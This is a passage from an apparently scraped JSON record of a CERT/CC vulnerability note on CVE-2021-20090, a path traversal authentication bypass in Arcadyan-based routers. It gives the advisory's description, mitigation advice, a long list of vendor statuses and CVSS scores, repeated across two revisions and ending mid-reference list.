router and also disable the web interface on the WAN. \n\n### Acknowledgements\n\nThanks to the reporter Evan Grant from Tenable.\n\nThis document was written by Timur Snoke.\n\n### Vendor Information \n\n914124\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Buffalo Technology __ Affected\n\nNotified: 2021-07-06 Updated: 2021-08-03 **CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n\n### Deutsche Telekom __ Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\na detailed List and Product Advisory is being created, as well as fixes.\n\n### Actiontec Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ADTRAN Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cradlepoint Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### F5 Networks Inc. Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### OpenWRT Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### D-Link Systems Inc. __ Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nD-Link US SIRT,\n\nWe have elevated information to D-Link Corporation for investigation.\n\nIf affected and we have scope we will update. \n\nThank you for the notification, William Brown security@dlink.com\n\n### A10 Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ACCESS Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Alcatel-Lucent Enterprise Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Arcadyan Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ARRIS Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ASUSTeK Computer Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AT&amp;T Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Avaya Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AVM GmbH Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Beeline Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Belkin Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### British Telecommunications Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Brocade Communication Systems Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Check Point Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cisco Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Comcast Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Commscope Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### dd-wrt Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Dell Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### eero Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Extreme Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### F-Secure Corporation Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hitachi Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Huawei Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hughes Network Systems Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### IBM Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Intel Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Juniper Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### LANCOM Systems GmbH Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Linksys Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### MikroTik Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Mitel Networks Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Motorola Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### NetComm Wireless Limited Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Netgear Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Nokia Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Peplink Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### pfSense Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Quagga Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Quantenna Communications Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Ruckus Wireless Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Sierra Wireless Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### SMC Networks Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Synology Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TDS Telecom Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Technicolor Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Telus Unknown\n\nNotified: 2021-07-08 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TP-LINK Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Ubiquiti Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Verizon Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vodafone Group Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Wind River Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Zyxel Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\nView all 61 vendors __View less vendors __\n\n \n\n\n### References \n\n * <https://www.tenable.com/security/research/tra-2021-13>\n * <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n * <https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2021-20090 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-20090>) \n---|--- \n**Date Public:** | 2021-07-20 \n**Date First Published:** | 2021-07-20 \n**Date Last Updated: ** | 2021-08-10 16:58 UTC \n**Document Revision: ** | 6 \n", "published": "2021-07-20T00:00:00", "modified": "2021-08-10T16:58:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.kb.cert.org/vuls/id/914124", "reporter": "CERT", "references": ["https://www.tenable.com/security/research/tra-2021-13", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090", "https://www.buffalo.jp/news/detail/20210427-03.html", "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2"], "cvelist": ["CVE-2021-20090"], "immutableFields": [], "lastseen": "2021-08-10T17:49:31", "history": [], "viewCount": 36, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-20090"]}, {"type": "nessus", "idList": ["BUFFALO_WSR_CVE_2021_20090.NASL"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB"]}, {"type": "threatpost", "idList": ["THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}, {"type": "thn", "idList": ["THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}], "modified": "2021-08-10T17:49:31", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2021-08-10T17:49:31", "rev": 2}}, "objectVersion": "1.6"}, "lastseen": "2021-08-10T17:49:31", "differentElements": ["description", "modified"], "edition": 5}, {"bulletin": {"id": "VU:914124", "hash": "ffa57c6cb97950b275130884c5e4ca8e", "type": "cert", "bulletinFamily": "info", "title": "Arcadyan-based routers and modems vulnerable to authentication bypass", "description": "### Overview\n\nA path traversal vulnerability exists in numerous routers manufactured by multiple vendors using Arcadyan based software. This vulnerability allows an unauthenticated user access to sensitive information and allows for the alteration of the router configuration.\n\n### Description\n\nThe vulnerability, identified as [CVE-2021-20090](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>), is a path traversal vulnerability. An unauthenticated attacker is able to leverage this vulnerability to access resources that would normally be protected. The researcher initially thought it was limited to one router manufacturer and published their [findings](<https://www.tenable.com/security/research/tra-2021-13>), but then discovered that the issue existed in the Arcadyan based software that was being used in routers from multiple vendors.\n\n### Impact\n\nSuccessful exploitation of this vulnerability could allow an attacker to access pages that would otherwise require authentication. An unauthenticated attacker could gain access to sensitive information, including valid request tokens, which could be used to make requests to alter router settings.\n\n### Solution\n\nThe CERT/CC recommends updating your router to the latest available firmware version. It is also recommended to disable the remote (WAN-side) administration services on any SoHo router and also disable the web interface on the WAN. \n\n### Acknowledgements\n\nThanks to the reporter Evan Grant from Tenable.\n\nThis document was written by Timur Snoke.\n\n### Vendor Information \n\n914124\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Buffalo Technology __ Affected\n\nNotified: 2021-07-06 Updated: 2021-08-03 **CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n\n### Deutsche Telekom __ Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\na detailed List and Product Advisory is being created, as well as fixes.\n\n### Actiontec Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ADTRAN Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Brocade Communication Systems __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nNo Brocade Fibre Channel Products from Broadcom products are currently known to be affected by this vulnerability.\n\n### Cradlepoint Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Dell Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### F5 Networks Inc. Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Intel Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### OpenWRT Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Sierra Wireless Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### D-Link Systems Inc. __ Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nD-Link US SIRT,\n\nWe have elevated information to D-Link Corporation for investigation.\n\nIf affected and we have scope we will update. \n\nThank you for the notification, William Brown security@dlink.com\n\n### A10 Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ACCESS Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Alcatel-Lucent Enterprise Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Arcadyan Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ARRIS Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ASUSTeK Computer Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AT&amp;T Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Avaya Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AVM GmbH Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Beeline Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Belkin Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### British Telecommunications Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Check Point Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cisco Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Comcast Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Commscope Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### dd-wrt Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### eero Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Extreme Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### F-Secure Corporation Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hitachi Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Huawei Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hughes Network Systems Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### IBM Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Juniper Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### LANCOM Systems GmbH Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Linksys Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### MikroTik Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Mitel Networks Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Motorola Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### NetComm Wireless Limited Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Netgear Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Nokia Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Peplink Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### pfSense Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Quagga Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Quantenna Communications Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Ruckus Wireless Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### SMC Networks Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Synology Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TDS Telecom Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Technicolor Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Telus Unknown\n\nNotified: 2021-07-08 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TP-LINK Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Ubiquiti Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Verizon Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vodafone Group Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Wind River Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Zyxel Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\nView all 61 vendors __View less vendors __\n\n \n\n\n### References \n\n * <https://www.tenable.com/security/research/tra-2021-13>\n * 